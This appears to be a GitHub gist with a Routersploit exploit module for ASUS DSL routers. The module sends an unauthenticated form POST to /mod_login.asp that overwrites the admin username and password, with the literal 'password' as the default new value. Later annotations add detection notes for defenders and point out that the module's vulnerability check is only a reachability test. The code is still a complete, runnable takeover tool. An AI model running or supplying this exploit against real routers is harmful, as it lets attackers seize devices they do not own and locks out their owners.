@paralax
Created August 14, 2018 18:22
ASUS Router Password Reset - Routersploit module
import random
import string
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient):
    """Routersploit module that resets the web-admin password on ASUS DSL routers.

    The module issues two HTTP requests against the configured target:
    a GET of ``/mod_login.asp`` (see ``check``) and, if that answers with
    HTTP 200, a form-encoded POST to the same path carrying the new
    account name and password (see ``run``). The module itself attaches
    no credentials or session cookie to either request; the underlying
    flaw is described in the write-up linked under ``references``.

    Detection notes for defenders, all taken from the request built below:
    a POST to ``/mod_login.asp`` whose body contains ``action_mode=apply``,
    ``current_page=Main_Password.asp``, ``usernamepasswdFlag=1`` and the
    ``http_username`` / ``http_passwd`` fields, arriving from a client that
    has not logged in, matches this module's traffic. Keeping the router's
    admin web interface unreachable from untrusted networks removes the
    exposure regardless of firmware level.
    """

    __info__ = {
        "name": "ASUS Router Password Reset",
        "description": "Module exploits remote flaw in ASUS devices to reset the "
                       "admin password. If the target is vulnerable, it will be "
                       "set to the attacker's chosing.",
        "authors": (
            "@jnazario",  # routersploit module
        ),
        "references": (
            "https://www.securityartwork.es/2018/01/25/some-vulnerability-in-asus-routers/",
        ),
        # Models the module author lists as affected; the module never
        # compares the target against this list at run time.
        "devices": (
            "DSL-AC51",
            "DSL-AC52U",
            "DSL-AC55U",
            "DSL-N55U C1",
            "DSL-N55U D1",
            "DSL-AC56U",
            "DSL-N10_C1",
            "DSL-N12U C1",
            "DSL-N12E C1",
            "DSL-N14U",
            "DSL-N14U-B1",
            "DSL-N16",
            "DSL-N16U",
            "DSL-N17U",
            "DSL-N66U",
            "DSL-AC750",
        ),
    }

    # Module options exposed to the routersploit console.
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")
    username = OptString("admin", "Account to change")
    # The default new password is the literal string "password"; a device
    # tested with the defaults is left with that credential.
    password = OptString("password", "New password password")

    def run(self):
        """Send the password-change form to the target.

        Returns:
            The response body when the POST answers with HTTP 200, the
            empty string when no response was received, and ``None`` in
            every other case (``check`` failed, or a non-200 status).

        A 200 status is the only success criterion used here; the module
        does not log in afterwards or otherwise confirm that the stored
        credentials actually changed.
        """
        # NOTE(review): the listing on the page has lost its indentation.
        # This message is taken to be the else-branch of the check() test,
        # as is conventional for routersploit modules - confirm against
        # the original file.
        if not self.check():
            print_error("Target is not vulnerable")
            return None

        print_success("Target appears to be vulnerable")

        # As written, the Referer is the bare target address followed by the
        # page path, with no scheme or port. A browser would not normally
        # send a Referer in that form, which makes it a usable signal when
        # reviewing HTTP logs for this module's traffic.
        referer = self.target + "/Main_Password.asp"
        request_headers = {
            "Content-Type": "application/x-www-form-urlencoded",
            "Referer": referer,
        }

        # Form fields in the same order as the original module.
        form_fields = {
            "group_id": "",
            "action_mode": "apply",
            "current_page": "Main_Password.asp",
            "next_page": "/index.asp",
            "flag": "",
            "usernamepasswdFlag": "1",
            "http_username": self.username,
            "http_passwd": self.password,
            "foilautofill": "",
        }

        reply = self.http_request(
            method="POST",
            path="/mod_login.asp",
            headers=request_headers,
            data=form_fields,
        )

        if reply is None:
            print_error("Exploit failed")
            return ''

        return reply.text if reply.status_code == 200 else None

    @mute
    def check(self):
        """Report whether ``GET /mod_login.asp`` answers with HTTP 200.

        This is a reachability test only: it inspects neither the response
        body, the device model nor the firmware version, so any web server
        that returns 200 for that path is reported as vulnerable. Treat a
        ``True`` result as "worth verifying", not as confirmation.

        Returns:
            ``True`` on an HTTP 200 response, ``False`` when there is no
            response or the status differs.
        """
        probe = self.http_request(method="GET", path="/mod_login.asp")
        return probe is not None and probe.status_code == 200
@johnnynunez

how to reset password?
